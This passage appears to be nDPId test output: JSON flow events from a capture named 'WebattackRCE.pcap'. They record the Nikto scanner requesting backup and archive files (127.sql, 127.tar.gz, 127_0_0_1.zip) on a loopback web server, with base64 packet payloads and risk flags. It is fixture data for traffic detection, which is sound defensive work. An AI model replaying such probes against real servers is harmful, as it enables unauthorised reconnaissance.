Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 